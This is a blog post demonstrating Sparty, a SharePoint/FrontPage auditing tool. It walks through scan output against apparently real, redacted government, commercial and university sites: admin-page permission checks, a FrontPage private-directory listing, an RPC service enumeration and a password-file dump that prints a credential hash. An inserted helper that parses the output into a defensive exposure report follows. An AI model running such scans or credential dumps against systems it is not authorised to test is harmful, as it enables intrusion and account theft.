Sparty – MS Sharepoint and Frontpage Auditing Tool

At the last BlackHat USA Arsenal, a tool for auditing SharePoint and FrontPage was presented.

The author describes the tool as follows:

Sparty is an open source tool written in Python to audit web applications using SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint and FrontPage based web applications. Due to the complex nature of this web administration software, it is necessary to have a simple and efficient tool that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.

I have used it, and it has given me quite good results.

Permission checking

One of the things we can do with the tool is check access permissions on the SharePoint administration pages; let's look at an example.


[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -s layouts -u https://www.XXXXXXXXXX.gov
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (https://www.XXXXXXXXXX.gov/SitePages/Home.aspx)
[+] target responded with HTTP code: (200)
[+] target is running server: (Microsoft-IIS/7.5)

[+]-----------------------------------------------------------------!
[+] auditing sharepoint '/_layouts/' directory for access permissions !
[+]-------------------------------------------------------------------!

[-] (https://www.XXXXXXXXXX.gov/_layouts/aclinv.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/addrole.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/AdminRecycleBin.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/AreaNavigationSettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_Layouts/AreaTemplateSettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_Layouts/AreaWelcomePage.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/associatedgroups.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/bpcf.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_Layouts/ChangeSiteMasterPage.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/create.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/editgrp.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/editprms.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/groups.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/help.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/images/) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/listedit.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/ManageFeatures.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/ManageFeatures.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mcontent.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngctype.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngfield.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngsiteadmin.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngsubwebs.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/mngsubwebs.aspx?view=sites) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/mobile/mbllists.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/MyInfo.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/MyPage.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/MyTasks.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/navoptions.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/NewDwp.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/newgrp.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/newsbweb.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/PageSettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/people.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/people.aspx?MembershipGroupId=0) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/permsetup.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/picker.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/policy.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/policyconfig.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/policycts.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/Policylist.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/prjsetng.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/quiklnch.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/recyclebin.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_Layouts/RedirectPage.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/role.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/settings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/SiteDirectorySettings.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/sitemanager.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/SiteManager.aspx?lro=all) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/spcf.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/storman.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/themeweb.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/topnav.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/user.aspx) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/userdisp.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/userdisp.aspx?ID=1) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/useredit.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/useredit.aspx?ID=1) - (403)
[+] (https://www.XXXXXXXXXX.gov/_layouts/viewgrouppermissions.aspx) - (200)
[+] (https://www.XXXXXXXXXX.gov/_layouts/viewlsts.aspx) - (200)
[-] (https://www.XXXXXXXXXX.gov/_layouts/vsubwebs.aspx) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/WPPrevw.aspx?ID=247) - (403)
[-] (https://www.XXXXXXXXXX.gov/_layouts/wrkmng.aspx) - (403)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (layout file access) - module executed successfully !

In the case of FrontPage, we can dump credentials 😀


[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -d dump -u http://www.XXXXX.com
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (http://www.XXXXX.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k DAV/2 PHP/5.3.2 with Suhosin-Patch)

[+]------------------------------------------------------------------------------------------------!
[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!
[+]--------------------------------------------------------------------------------------------------!

[+] dumping contents of file located at : (http://www.XXXXX.com/_vti_pvt/service.pwd)

[*] ---------------------------------------------------------------------------------------
[-] could not dump the file located at : (http://http://www.XXXXX.com/_vti_pvt/administrators.pwd) | (404)
[-] could not dump the file located at : (http://www.XXXXX.com/_vti_pvt/authors.pwd) | (404)
[+] check the (__dump__.txt) file if generated !


[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (password dumping) - module executed successfully !

[email protected]:~/sparty_v_0.1# cat __dump__.txt
# -FrontPage-
admin:5MDuTmvQx/6Fk

We can also scan the permissions of the FrontPage private directory:

[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -f pvt -u http://www.XXXXXX.com
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (http://www.XXXXXX.com)
[+] target responded with HTTP code: (200)
[+] target is running server: (Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k DAV/2 PHP/5.3.2 with Suhosin-Patch)

[+]---------------------------------------------------------!
[+] auditing '/_vti_pvt/' directory for sensitive information !
[+]-----------------------------------------------------------!

[-] (http://www.XXXXXX.com/_vti_pvt/authors.pwd) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/administrators.pwd) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/users.pwd) - (404)
[+] http://www.XXXXXX.com/_vti_pvt/service.pwd) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/service.grp) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/bots.cnf) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/service.cnf) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/access.cnf) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/writeto.cnf) - (200)
[-] (http://www.XXXXXX.com/_vti_pvt/botsinf.cnf) - (404)
[+] (http://www.XXXXXX.com/_vti_pvt/doctodep.btr) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/deptodoc.btr) - (200)
[+] (http://www.XXXXXX.com/_vti_pvt/linkinfo.cnf) - (200)
[-] (http://www.XXXXXX.com/_vti_pvt/services.org) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/structure.cnf) - (404)
[+] (http://www.XXXXXX.com/_vti_pvt/svcacl.cnf) - (200)
[-] (http://www.XXXXXX.com/_vti_pvt/uniqperm.cnf) - (404)
[-] (http://www.XXXXXX.com/_vti_pvt/service/lck) - (404)
[+] (http://www.XXXXXX.com/_vti_pvt/frontpg.lck) - (200)

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (pvt file access) - module executed successfully !

Another thing we can try is the exploit modules, for example the FrontPage RPC service listing:

[email protected]:~/sparty_v_0.1# python sparty_v_0.1.py -e rpc_service_listing -u http://XXXXXX.edu
 ---------------------------------------------------------------

_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
 _| _| _| _| _| _| _| _| _| _|
 _|_| _|_|_| _|_|_|_| _|_|_| _| _|
 _| _| _| _| _| _| _| _|
 _|_|_| _| _| _| _| _| _| _|

SPARTY : Sharepoint/Frontpage Security Auditing Tool!
 Authored by: Aditya K Sood [email protected] | 2013
 Twitter: @AdityaKSood
 Powered by: SecNiche Security Labs !

--------------------------------------------------------------
[+] fetching information from the given target : (http://XXXXXX.edu)
[+] target responded with HTTP code: (200)
[+] target is running server: (HP-UX_Apache-based_Web_Server/2.0.48 (Unix) PHP/4.2.3 DAV/2 mod_ssl/2.0.48 OpenSSL/0.9.7c FrontPage/5.0.2.2635)

[+]-----------------------------------------------------------------------!
[+] auditing frontpage RPC service for fetching listing !
[+]-------------------------------------------------------------------------!

[+] Sending HTTP POST request to retrieve service listing - (http://XXXXXX.edu/_vti_bin/shtml.exe/_vti_rpc)
[+] target accepts the request - (method=list+services:3.0.2.1076&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:3.0.2.1076&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.471&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.471&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.0000&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.0000&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.4803&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.4803&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.2623&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.2623&service_name=.html)

[+] target accepts the request - (method=list+services:6.0.2.5420&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:6.0.2.5420&service_name=.html)

[*] ---------------------------------------------------------------------------------------
[+] Sending HTTP POST request to retrieve service listing - (http://XXXXXX.edu/_vti_bin/shtml.dll/_vti_rpc)
[+] target accepts the request - (method=list+services:3.0.2.1076&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:3.0.2.1076&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.471&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.471&service_name=.html)

[+] target accepts the request - (method=list+services:4.0.2.0000&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:4.0.2.0000&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.4803&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.4803&service_name=.html)

[+] target accepts the request - (method=list+services:5.0.2.2623&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:5.0.2.2623&service_name=.html)

[+] target accepts the request - (method=list+services:6.0.2.5420&service_name=) | (200) !
[+] check file for contents - (__service-list__.txtmethod=list+services:6.0.2.5420&service_name=.html)

[*] ---------------------------------------------------------------------------------------

[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error

[+] (module RPC service listing check) - module executed successfully !
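Sparty prints one result line per probed URL in the form `[+] (URL) - (CODE)`, and a 200 on a `_vti_pvt` or `_layouts` path is what an auditor needs to follow up on. The following helper is an added example (not part of Sparty or of this post) that parses such output into a severity-grouped exposure report; the sample lines and `example.test` host are constructed, and the parser tolerates the occasional missing "(" before a URL that appears in the tool's output above.

```python
import re

# Constructed sample in the shape of Sparty's per-URL result lines (not real tool output).
SAMPLE_OUTPUT = """\
[-] (http://www.example.test/_vti_pvt/authors.pwd) - (404)
[+] http://www.example.test/_vti_pvt/service.pwd) - (200)
[+] (http://www.example.test/_vti_pvt/service.cnf) - (200)
[-] (https://www.example.test/_layouts/settings.aspx) - (403)
[+] (https://www.example.test/_layouts/viewlsts.aspx) - (200)
[+] (https://www.example.test/_layouts/help.aspx) - (200)
[+] target responded with HTTP code: (200)
"""

# "[+]" or "[-]", an optionally parenthesised URL, then " - (NNN)".
# The optional "(" handles lines where the tool omits the opening parenthesis.
LINE_RE = re.compile(r"^\[[+-]\]\s+\(?(https?://\S+?)\)?\s+-\s+\((\d{3})\)\s*$")

# Severity of an anonymously reachable (HTTP 200) path, from a defender's point of view.
# These categories are this example's own, not Sparty's.
SEVERITY_RULES = [
    (re.compile(r"/_vti_pvt/.*\.pwd$", re.I), "critical"),  # FrontPage credential files
    (re.compile(r"/_vti_pvt/", re.I), "high"),              # other FrontPage private metadata
    (re.compile(r"/_layouts/", re.I), "medium"),            # SharePoint admin pages without auth
]


def parse_sparty_output(text):
    """Return (url, status) tuples for every per-URL result line; banner lines are skipped."""
    results = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:
            results.append((match.group(1), int(match.group(2))))
    return results


def classify(url):
    """Map a URL to a severity bucket using the first matching rule."""
    for pattern, severity in SEVERITY_RULES:
        if pattern.search(url):
            return severity
    return "info"


def exposures(text):
    """Group HTTP 200 results by severity; 403/404 are the expected, hardened state."""
    report = {}
    for url, status in parse_sparty_output(text):
        if status == 200:
            report.setdefault(classify(url), []).append(url)
    return report
```

Feeding a real run's output through `exposures()` gives the list of paths to restrict or remove, ordered by how much an anonymous 200 on them matters.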

The tool's page is here => http://sparty.secniche.org/



Author: Seifreed

Trained in an anti-fraud team. I have worked implementing fraud protection and prevention for several clients in the national and international banking sector. My job consists of finding solutions to the current and future problems that financial institutions face regarding malicious code and fraud. Specialties such as malware analysis, forensic analysis, reverse engineering and ethical hacking are part of my daily work. I am a speaker at national events (No cON Name, Owasp, Navaja Negra) and international ones (DragonJAR CON - Colombia). I am an associate professor at La Salle, teaching the MPWAR course (Master in High Performance Web Programming) and La Salle's cybersecurity master's (MCS, Master in Cybersecurity). Member of associations and research groups such as the HoneyNet Project, Owasp, SySsec, etc. I am also the organizer of the Hack&Beers conferences in Barcelona.

  • Very good information. I just have a problem downloading the tool: when I unzip it, it tells me the file is corrupted. I have tried on Ubuntu and Windows.
